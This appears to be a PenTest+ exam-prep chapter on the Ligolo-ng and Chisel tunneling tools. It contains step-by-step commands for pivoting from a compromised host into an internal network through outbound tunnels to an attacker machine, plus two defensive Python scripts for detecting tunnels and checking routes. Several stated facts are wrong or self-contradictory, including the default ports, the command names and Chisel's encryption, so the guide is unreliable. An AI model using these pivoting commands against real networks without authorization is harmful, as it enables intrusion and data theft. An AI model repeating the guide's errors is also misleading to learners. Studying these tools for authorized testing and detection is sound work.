This chapter covers two essential tunneling tools for penetration testing: Ligolo-ng and Chisel. Both tools are used to establish encrypted tunnels through restrictive firewalls, allowing testers to access internal networks from a remote position. The PT0-002 exam tests your ability to select and configure the appropriate tunneling tool for a given scenario, with a focus on practical application. Questions may ask you to identify the correct tool based on features, choose the proper command syntax, or troubleshoot common issues. Expect 5-10% of exam questions to touch on tunneling concepts, including these tools.
Imagine you are a spy in a heavily guarded building. The building's security (firewall) blocks all direct external connections. However, you have a contact inside the building who can make outbound calls (egress traffic) to your command center. You need to establish a reliable communication channel to exfiltrate data and send commands. This is where tunneling tools like Ligolo-ng and Chisel come in. Think of Ligolo-ng as building a dedicated underground subway tunnel between your command center and the interior of the building. Once the tunnel is built, you can freely move personnel (traffic) back and forth without going through security checkpoints. Chisel, on the other hand, is like a single, encrypted pipe that you can use to send specific messages or files (ports) through, but it requires a bit more setup to route multiple types of traffic. In both cases, the key is that the initial connection is made from inside the building (outbound) to bypass the firewall's inbound restrictions. Once established, the tunnel allows bidirectional communication, effectively making the internal network accessible from the outside as if you were inside. Just as a subway tunnel can carry multiple trains (protocols) and passengers (data), these tools can tunnel multiple types of traffic over a single connection. The difference is that Ligolo-ng creates a full network interface tunnel, while Chisel creates a SOCKS proxy or port forwarding tunnel.
What are Ligolo-ng and Chisel?
Ligolo-ng and Chisel are open-source tunneling tools used in penetration testing to create encrypted communication channels through firewalls. They enable an attacker to access internal network resources from a remote machine by establishing a tunnel that bypasses network perimeter controls. Both tools rely on a client-server architecture where the client (agent) runs on the target internal machine and initiates an outbound connection to the server (proxy) running on the attacker's machine. This outbound connection is typically allowed by firewalls, which block inbound connections but permit outbound traffic. Once the tunnel is established, the attacker can route traffic through it to reach internal hosts.
Ligolo-ng: Network-Level Tunneling
Ligolo-ng is a tunneling tool that creates a virtual network interface on the attacker's machine. It uses TUN/TAP interfaces to forward traffic at the IP level. The tool is written in Go and is designed to be lightweight and cross-platform. Ligolo-ng supports TCP and UDP tunneling and can handle multiple connections simultaneously.
How Ligolo-ng Works:
The attacker sets up a Ligolo-ng server (proxy) on their machine. The server listens on a configurable port (default 5555) for incoming connections from agents.
The agent (client) is deployed on the target internal machine. The agent connects back to the attacker's server over TCP, establishing an encrypted TLS tunnel.
Once the tunnel is established, the attacker creates a virtual network interface (e.g., tun0) on their machine. This interface is assigned an IP address from a private range (e.g., 10.10.0.1/24).
The attacker adds routes on their machine to send traffic destined for the internal network through the virtual interface. For example, ip route add 192.168.1.0/24 dev tun0.
When the attacker sends a packet to an internal IP (e.g., 192.168.1.10:80), the packet is routed through the virtual interface, encapsulated within the TLS tunnel, and forwarded to the agent. The agent decapsulates the packet and sends it to the actual internal host.
The agent also handles responses: it captures return traffic, encapsulates it, and sends it back through the tunnel to the attacker's machine.
Key Components and Defaults:
Ligolo-ng Server (proxy): Command: ligolo-ng proxy -l 0.0.0.0:5555. Default listening port: 5555. The server can also listen on other ports using the -l flag.
Ligolo-ng Agent (client): Command: ligolo-ng agent -connect <server_ip>:5555 -ignore-cert. The -ignore-cert flag skips TLS certificate validation (useful for self-signed certs).
Virtual Interface: After connecting, the server creates a TUN interface (e.g., tun0). The attacker must configure routing to direct traffic through it.
Routing: On Linux, use ip route add <target_network> dev tun0. On Windows, use route add <target_network> mask <subnet> <gateway_ip> where gateway IP is the virtual interface IP.
TLS: The tunnel uses TLS for encryption. Certificates can be self-signed or custom.
Traffic Flow Example:
Attacker Machine (10.10.0.1) -> Ligolo-ng Proxy (port 5555) <--- TLS ---> Agent (192.168.1.100) -> Internal Host (192.168.1.10:80)
When the attacker runs curl http://192.168.1.10:80, the operating system routes the packet to the tun0 interface. The proxy encapsulates the packet and sends it over the TLS connection to the agent. The agent decapsulates and forwards it to 192.168.1.10:80. The response follows the reverse path.
Ligolo-ng Features:
Supports both TCP and UDP.
Can tunnel multiple concurrent connections.
Supports SOCKS proxy mode (using -socks flag on proxy).
Can relay traffic through multiple agents (pivoting).
Provides a built-in listener for reverse port forwarding.
Chisel: Application-Level Tunneling
Chisel is a fast TCP/UDP tunnel over HTTP. It uses the WebSocket protocol to create an encrypted tunnel. Chisel is also written in Go and is designed for scenarios where only HTTP traffic is allowed through the firewall. It can tunnel any TCP or UDP traffic, but it operates at the application layer, making it more flexible for proxy scenarios.
How Chisel Works:
The attacker starts a Chisel server on their machine. By default, the server listens on port 8080 for HTTP connections.
The client (agent) on the target machine connects to the server over HTTP. The connection is upgraded to a WebSocket, creating a persistent tunnel.
The client can be configured to create a SOCKS proxy on the server side, allowing the attacker to use any SOCKS-capable tool (like proxychains) to route traffic through the tunnel.
Alternatively, the client can create local port forwards (reverse port forwarding) to expose internal services to the attacker's machine.
Key Components and Defaults:
Chisel Server: Command: chisel server --port 8080 --reverse. The --reverse flag enables reverse port forwarding and SOCKS proxy modes. Default port: 8080.
Chisel Client: Command: chisel client <server_ip>:8080 R:socks. The R:socks directive creates a SOCKS5 proxy on the server side, listening on port 1080 by default. Other directives: R:<local_port>:<remote_host>:<remote_port> for reverse port forwarding.
SOCKS Proxy: Default SOCKS port is 1080. The proxy is only accessible from the server machine (localhost).
Encryption: Chisel uses TLS for encryption. The server generates a self-signed certificate by default.
WebSocket: The tunnel is established over HTTP upgrade to WebSocket, which can bypass firewalls that inspect HTTP traffic.
Traffic Flow Example:
Attacker runs: chisel server --port 8080 --reverse
Agent runs: chisel client 10.0.0.1:8080 R:socks
Attacker now has a SOCKS5 proxy at 127.0.0.1:1080.
Attacker uses proxychains: proxychains nmap -sT 192.168.1.0/24
Proxychains sends each connection through the SOCKS proxy, which forwards it via the WebSocket tunnel to the agent. The agent then makes the actual connection to the internal target.
Chisel Features:
Supports TCP and UDP tunneling.
Can create multiple reverse port forwards.
Supports SOCKS5 proxy.
Can run in client-only mode (no server) for local port forwarding.
Supports authentication with a shared secret.
Comparing Ligolo-ng and Chisel
Both tools create encrypted tunnels, but they differ in their approach and use cases:
Network Layer vs Application Layer: Ligolo-ng operates at the network layer (IP), creating a virtual interface. Chisel operates at the application layer (HTTP/WebSocket).
Routing vs Proxy: Ligolo-ng requires routing configuration on the attacker's machine to send traffic through the virtual interface. Chisel provides a SOCKS proxy, which is easier to use with tools that support SOCKS (like nmap, curl, browsers).
Performance: Ligolo-ng is generally faster for bulk traffic because it avoids the overhead of SOCKS proxy. Chisel's SOCKS proxy adds some latency.
Firewall Evasion: Chisel's HTTP/WebSocket tunnel can bypass firewalls that allow HTTP but block other protocols. Ligolo-ng's TLS tunnel over TCP may be more conspicuous.
Setup Complexity: Ligolo-ng requires network routing configuration, which can be error-prone. Chisel requires only a SOCKS proxy directive.
When to Use Each Tool
Use Ligolo-ng when: You need to tunnel many different types of traffic (including UDP) and want to use the attacker's machine as if it were directly connected to the internal network. Ideal for full network access.
Use Chisel when: You need a quick, easy-to-setup proxy for specific tools, or when only HTTP traffic is allowed outbound. Chisel is also useful for reverse port forwarding to expose a single service.
Common Commands and Syntax
Ligolo-ng Setup:
On attacker:
```shell
ligolo-ng proxy -l 0.0.0.0:5555
```
On target:
```shell
ligolo-ng agent -connect 10.0.0.1:5555 -ignore-cert
```
On attacker (after connection):
```shell
# Create TUN interface and add route
sudo ip tuntap add dev tun0 mode tun
sudo ip link set dev tun0 up
sudo ip addr add 10.10.0.1/24 dev tun0
sudo ip route add 192.168.1.0/24 dev tun0
```
Chisel Setup:
On attacker:
```shell
chisel server --port 8080 --reverse
```
On target:
```shell
chisel client 10.0.0.1:8080 R:socks
```
On attacker (use proxy):
```shell
proxychains nmap -sT -Pn 192.168.1.10
```
Verification and Troubleshooting
Ligolo-ng: Check the proxy log for connection status. Use ifconfig tun0 to verify the interface is up. Use ping 192.168.1.10 to test reachability.
Chisel: Check server logs for client connections. Use curl -x socks5://127.0.0.1:1080 http://192.168.1.10:80 to test.
Security Considerations
Both tools use TLS encryption by default, but the certificates are self-signed. Use -ignore-cert or --insecure flags at your own risk.
In a legitimate penetration test, you should use proper certificates to avoid detection.
The tools can be detected by network monitoring if the TLS handshake or WebSocket upgrade is inspected.
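The observables named above (a long-lived outbound TLS session to the Ligolo-ng default port, or an HTTP request that upgrades to WebSocket toward an external host on the Chisel default port) are enough to build a first-pass detection. The script below is an added example, not code from this guide or from either project: it scans constructed flow records in an invented key=value format (not real Zeek or firewall output) and reports which heuristics each outbound flow triggered. The internal ranges, the one-hour session threshold and the port-to-tool mapping are assumptions to tune for your own environment.

```python
"""Heuristic detection of Ligolo-ng / Chisel style outbound tunnels.

Added example (not from the guide or either project). Scans constructed
flow records for: an outbound session to the Ligolo-ng default port 5555,
a WebSocket upgrade toward an external host (Chisel default port 8080),
and unusually long-lived sessions. All thresholds are assumptions.
"""
import ipaddress

# Constructed sample records, one per line (invented format, not a real log).
# Fields: ts, src, dst, dport, proto, optional upgrade, duration (s), bytes.
SAMPLE_FLOWS = """\
ts=1700000001 src=192.168.1.100 dst=203.0.113.10 dport=443 proto=tls duration=2 bytes=18000
ts=1700000002 src=192.168.1.100 dst=203.0.113.10 dport=5555 proto=tls duration=5400 bytes=91000000
ts=1700000003 src=192.168.1.55 dst=203.0.113.20 dport=8080 proto=http upgrade=websocket duration=7200 bytes=4200000
ts=1700000004 src=192.168.1.55 dst=192.168.1.30 dport=8080 proto=http upgrade=websocket duration=30 bytes=12000
ts=1700000005 src=192.168.1.77 dst=198.51.100.5 dport=80 proto=http duration=1 bytes=3000
"""

# Assumed internal ranges; anything else is treated as "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LONG_SESSION_SECONDS = 3600          # assumed threshold: a single session open for an hour
TUNNEL_PORTS = {5555: "ligolo-ng default", 8080: "chisel default"}   # defaults from the text


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flow(line):
    """Split one 'key=value key=value' record into a dict with numeric fields typed."""
    rec = dict(field.split("=", 1) for field in line.split())
    for key in ("dport", "duration", "bytes"):
        rec[key] = int(rec[key])
    return rec


def score_flow(rec):
    """Return the reasons this flow looks like a pivot tunnel (empty list if none)."""
    reasons = []
    if is_internal(rec["dst"]):
        return reasons                      # only outbound (egress) sessions matter here
    if rec["dport"] in TUNNEL_PORTS:
        reasons.append(f"outbound to {rec['dport']} ({TUNNEL_PORTS[rec['dport']]})")
    if rec.get("upgrade") == "websocket":
        reasons.append("WebSocket upgrade to external host")
    if rec["duration"] >= LONG_SESSION_SECONDS:
        reasons.append(f"session open {rec['duration']}s")
    return reasons


def find_suspect_flows(text):
    """Map 'src->dst:port' to its reasons for every flow that triggered a heuristic."""
    hits = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_flow(line)
        reasons = score_flow(rec)
        if reasons:
            hits[f"{rec['src']}->{rec['dst']}:{rec['dport']}"] = reasons
    return hits


if __name__ == "__main__":
    for flow, reasons in find_suspect_flows(SAMPLE_FLOWS).items():
        print(flow, "=>", "; ".join(reasons))
```

The internal-to-internal WebSocket session on port 8080 is deliberately ignored, and a short TLS session on 443 scores nothing: the heuristics only combine well when several fire on the same egress flow, so treat a single-reason hit as a lead for the analyst rather than an alert on its own.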
Interaction with Related Technologies
Proxychains: Commonly used with Chisel to route traffic through the SOCKS proxy.
Nmap: Can be used with Ligolo-ng (direct routing) or Chisel (through proxychains).
Metasploit: Can use Ligolo-ng for routing traffic through compromised hosts.
Firewalls: Both tools are designed to bypass firewalls that block inbound connections but allow outbound.
Set up Ligolo-ng Server
On the attacker machine, start the Ligolo-ng proxy server. The default listening port is 5555. Use the command `ligolo-ng proxy -l 0.0.0.0:5555`. The server will wait for incoming agent connections. It is important to specify the listening IP (0.0.0.0 to listen on all interfaces) and port. The server generates a self-signed TLS certificate for encryption. You can also specify a custom certificate with `-cert` and `-key` flags. Once started, the server displays its status and waits for agents.
Deploy Ligolo-ng Agent on Target
On the target machine (internal), run the Ligolo-ng agent. The agent must be able to make an outbound TCP connection to the attacker's server. Use the command `ligolo-ng agent -connect <attacker_ip>:5555 -ignore-cert`. The `-ignore-cert` flag skips TLS certificate validation, which is necessary if the server uses a self-signed certificate. The agent will connect back to the server and establish an encrypted tunnel. The agent can also be configured to use a specific agent name with `-name` flag for identification.
Configure Virtual Interface and Routing
On the attacker machine, after the agent connects, the server creates a TUN interface (e.g., tun0). The attacker must assign an IP address to this interface and add routes to direct traffic to the internal network through it. Typically, the attacker assigns an IP from a private range (e.g., 10.10.0.1/24) to the interface and adds a route for the target internal network (e.g., 192.168.1.0/24) via the interface. Use commands: `sudo ip addr add 10.10.0.1/24 dev tun0`, `sudo ip link set tun0 up`, and `sudo ip route add 192.168.1.0/24 dev tun0`. This step is critical; without proper routing, traffic will not flow through the tunnel.
Test Connectivity Through Tunnel
Verify the tunnel is working by pinging an internal host (e.g., ping 192.168.1.10). If the ping succeeds, the tunnel is functional. If not, check the routing table, TUN interface status, and firewall rules on both sides. Also ensure the agent is running and the server logs show the connection. Use `tcpdump -i tun0` to see if packets are being forwarded. Common issues include an incorrect route (e.g., a missing or wrong network mask) or the target host not responding (e.g., a firewall blocking ICMP).
Set up Chisel Server and Client
On the attacker, start Chisel server with `chisel server --port 8080 --reverse`. This enables reverse port forwarding and SOCKS proxy. On the target, run `chisel client <attacker_ip>:8080 R:socks`. This creates a SOCKS5 proxy on the attacker's side listening on 127.0.0.1:1080. The client connects to the server over HTTP, upgrades to WebSocket, and the tunnel is established. The attacker can then use any SOCKS-capable tool (e.g., proxychains) to route traffic through the tunnel. For reverse port forwarding, use `R:<local_port>:<target_host>:<target_port>` (e.g., `R:80:192.168.1.10:80` to expose internal web server on attacker's port 80).
In enterprise penetration tests, Ligolo-ng and Chisel are commonly used to pivot from a compromised host in a DMZ to an internal network. For example, a tester gains access to a web server in the DMZ (e.g., 10.0.0.5) that has outbound internet access. The internal network (192.168.1.0/24) is not directly reachable from the tester's machine. The tester deploys Ligolo-ng agent on the web server, which connects back to the tester's cloud-based server. Once the tunnel is up, the tester adds a route and can directly access internal hosts, such as a database server (192.168.1.10:3306), as if they were on the same network. This allows the tester to run nmap scans, exploit vulnerabilities, or exfiltrate data.
Another scenario involves a restrictive environment where only HTTP/HTTPS traffic is allowed outbound. Chisel is ideal here because it tunnels over HTTP/WebSocket. A tester might use Chisel to create a SOCKS proxy from a compromised Windows workstation. The tester can then use proxychains with tools like Metasploit or Burp Suite to attack internal applications. For example, the tester can run proxychains msfconsole and use modules that require network access to internal targets.
A common misconfiguration is forgetting to add the route in Ligolo-ng. Testers often assume the tunnel is working but cannot reach internal hosts because the operating system does not know to send traffic through the TUN interface. Another issue is using the wrong network mask in the route command. For Chisel, a frequent mistake is not using the --reverse flag on the server, without which reverse tunneling is unavailable. Also, if the target firewall blocks the HTTP upgrade (WebSocket), Chisel may fail; in such cases, using a different port or TLS may help. Performance-wise, Ligolo-ng handles high-volume traffic better than Chisel, which can become slow under heavy load due to SOCKS overhead. For large file transfers, Ligolo-ng is preferred.
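The two Ligolo-ng routing mistakes just described (no route at all, and a route with the wrong mask) both fail the same way: the kernel picks a different interface for the destination, so nothing ever enters tun0. The script below is an added example, not code from this guide or from the Ligolo-ng project; it parses `ip route` style output and applies the longest-prefix-match rule the Linux kernel uses, so you can confirm which interface a destination would leave on before blaming the tunnel. The three routing tables are constructed sample output, not captured from a real host, and the interface name tun0 and the addresses follow the text's own example.

```python
"""Egress-interface check for a TUN-based pivot (added example, not project code).

Parses `ip route` output and answers "which interface would packets to X
leave on?" using longest-prefix match. The three tables below are
constructed: a correct setup, the "forgot the route" case, and a route
with the wrong mask (/32 instead of /24).
"""
import ipaddress

# Constructed `ip route` output after the route from the text was added.
ROUTES_GOOD = """\
default via 10.0.0.1 dev eth0 proto static
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.50
10.10.0.0/24 dev tun0 proto kernel scope link src 10.10.0.1
192.168.1.0/24 dev tun0 scope link
"""

# Same host before `ip route add 192.168.1.0/24 dev tun0` was run.
ROUTES_NO_ROUTE = """\
default via 10.0.0.1 dev eth0 proto static
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.50
10.10.0.0/24 dev tun0 proto kernel scope link src 10.10.0.1
"""

# Wrong mask: a /32 covers only 192.168.1.1, not the rest of the subnet.
ROUTES_WRONG_MASK = """\
default via 10.0.0.1 dev eth0 proto static
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.50
192.168.1.1/32 dev tun0 scope link
"""


def parse_routes(text):
    """Turn `ip route` lines into (network, interface) pairs."""
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or "dev" not in fields:
            continue
        prefix = fields[0]
        # `default` is shorthand for 0.0.0.0/0; a bare address gets a /32.
        net = ipaddress.ip_network("0.0.0.0/0" if prefix == "default" else prefix, strict=False)
        dev = fields[fields.index("dev") + 1]
        routes.append((net, dev))
    return routes


def egress_interface(routes, dst):
    """Longest-prefix match: the most specific network containing dst wins."""
    addr = ipaddress.ip_address(dst)
    best = None
    for net, dev in routes:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, dev)
    return best[1] if best else None


def tunnel_covers(routes_text, dst, tun_dev="tun0"):
    """True only if dst would actually be sent into the tunnel interface."""
    return egress_interface(parse_routes(routes_text), dst) == tun_dev


if __name__ == "__main__":
    tables = [("good", ROUTES_GOOD), ("no route", ROUTES_NO_ROUTE), ("wrong mask", ROUTES_WRONG_MASK)]
    for label, table in tables:
        dev = egress_interface(parse_routes(table), "192.168.1.10")
        print(f"{label:>10}: 192.168.1.10 leaves via {dev}")
```

In the "no route" table the destination silently falls through to the default route on eth0, which is exactly why a tester sees the agent connected but gets no replies; in the "wrong mask" table only 192.168.1.1 reaches tun0, so a ping to 192.168.1.10 also goes out eth0. On a live host, feed the function the real output of `ip route` instead of the constructed strings.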
The PT0-002 exam (Objective 5.1) tests your ability to select and configure tunneling tools. The exam expects you to know the differences between Ligolo-ng and Chisel, their default ports, and common command syntax. Specifically, you should memorize:
Ligolo-ng default port: 5555
Chisel default port: 8080
Chisel SOCKS default port: 1080
Ligolo-ng uses TUN/TAP interfaces; Chisel uses HTTP/WebSocket.
Ligolo-ng requires routing configuration; Chisel provides a SOCKS proxy.
Common wrong answers on exam questions:
1. Confusing the default ports (e.g., thinking Chisel uses 5555).
2. Thinking Ligolo-ng uses SOCKS proxy by default (it does not; it uses a virtual interface).
3. Believing Chisel requires a TUN interface (it does not; it works at application layer).
4. Assuming both tools work only over TCP (both support UDP, but Ligolo-ng has better UDP support).
Exam questions often present a scenario and ask which tool to use. Key decision points:
If the scenario mentions 'direct network access' or 'full network layer', choose Ligolo-ng.
If the scenario mentions 'HTTP only' or 'SOCKS proxy', choose Chisel.
If the scenario mentions 'reverse port forwarding', both can do it, but Chisel is simpler.
The exam may also ask about command syntax: e.g., 'Which flag enables reverse tunneling in Chisel?' Answer: --reverse. Or 'Which flag ignores certificate validation in Ligolo-ng?' Answer: -ignore-cert.
Edge cases: The exam might test that Ligolo-ng can also act as a SOCKS proxy with -socks flag, or that Chisel can be used without --reverse for local forwarding. Also, remember that both tools support TLS encryption by default.
To eliminate wrong answers, focus on the mechanism: Ligolo-ng creates a virtual network interface; Chisel creates a proxy. Any answer that confuses these layers is likely wrong.
Ligolo-ng default port: 5555; Chisel server default port: 8080; Chisel SOCKS default port: 1080.
Ligolo-ng creates a TUN interface; Chisel creates a SOCKS proxy.
Ligolo-ng requires adding routes (e.g., `ip route add`); Chisel requires proxychains or SOCKS-aware tools.
Both tools support TLS encryption by default.
Use Ligolo-ng for full network access; use Chisel when only HTTP is allowed or for quick proxy setup.
Ligolo-ng agent connects with `-connect` flag; Chisel client uses `R:socks` for SOCKS proxy.
Chisel's `--reverse` flag is required for reverse tunneling and SOCKS proxy.
Ligolo-ng can also act as a SOCKS proxy with `-socks` flag.
Both tools are written in Go and are cross-platform.
Common exam trap: confusing default ports or thinking Chisel uses TUN/TAP.
These come up on the exam all the time. Here's how to tell them apart.
Ligolo-ng
Network-level tunnel (IP layer) using TUN/TAP interface
Default port: 5555
Requires routing configuration on attacker machine
Supports both TCP and UDP natively
Better performance for bulk traffic
Chisel
Application-level tunnel (HTTP/WebSocket) with SOCKS proxy
Default server port: 8080; SOCKS port: 1080
No routing needed; uses SOCKS proxy via proxychains
Supports TCP and UDP, but UDP requires special handling
Slightly higher latency due to SOCKS overhead
Mistake
Ligolo-ng and Chisel are interchangeable and work the same way.
Correct
They differ fundamentally: Ligolo-ng creates a network-level tunnel using a virtual interface, while Chisel creates an application-level tunnel using HTTP/WebSocket and SOCKS proxy. The choice depends on the scenario.
Mistake
Both tools require a TUN/TAP interface on the client side.
Correct
Only Ligolo-ng creates a TUN interface on the server (attacker) side. Chisel does not use TUN/TAP; it tunnels traffic through WebSocket and provides a SOCKS proxy.
Mistake
Chisel's default port is 1080.
Correct
Chisel's server default port is 8080. The SOCKS proxy created by Chisel listens on port 1080 by default, but the tunnel itself uses port 8080.
Mistake
Ligolo-ng cannot tunnel UDP traffic.
Correct
Ligolo-ng supports both TCP and UDP tunneling. It can handle DNS queries and other UDP-based protocols.
Mistake
Chisel only works over HTTP and cannot use TLS.
Correct
Chisel uses TLS by default for encryption. The WebSocket connection is upgraded from HTTP, but the underlying transport is encrypted with TLS.
Ligolo-ng creates a network-level tunnel using a virtual TUN interface, allowing direct routing to internal networks. Chisel creates an application-level tunnel over HTTP/WebSocket, typically providing a SOCKS proxy. Ligolo-ng requires routing configuration; Chisel requires a SOCKS-capable tool like proxychains. Choose Ligolo-ng for full network access, Chisel for quick proxy setup or when only HTTP is allowed.
Ligolo-ng server listens on port 5555 by default. Chisel server listens on port 8080 by default. When Chisel creates a SOCKS proxy, it listens on port 1080 by default. These are common exam facts.
On the attacker, run `ligolo-ng proxy -l 0.0.0.0:5555`. On the target, run `ligolo-ng agent -connect <attacker_ip>:5555 -ignore-cert`. Then on the attacker, create a TUN interface (e.g., `sudo ip tuntap add dev tun0 mode tun`), assign an IP (`sudo ip addr add 10.10.0.1/24 dev tun0`), and add a route (`sudo ip route add <target_network> dev tun0`).
On the attacker, run `chisel server --port 8080 --reverse`. On the target, run `chisel client <attacker_ip>:8080 R:socks`. The attacker then has a SOCKS5 proxy at 127.0.0.1:1080. Use with proxychains: `proxychains <tool>`.
Yes, Ligolo-ng supports both TCP and UDP tunneling. It can handle protocols like DNS. Chisel also supports UDP but requires explicit configuration (e.g., using `R:udp` directives).
The `-ignore-cert` flag on the Ligolo-ng agent skips TLS certificate validation. This is necessary when the server uses a self-signed certificate. Without it, the agent may reject the connection if the certificate is not trusted.
The `--reverse` flag on the Chisel server enables reverse tunneling capabilities, including reverse port forwarding and SOCKS proxy. Without this flag, the client cannot create reverse tunnels.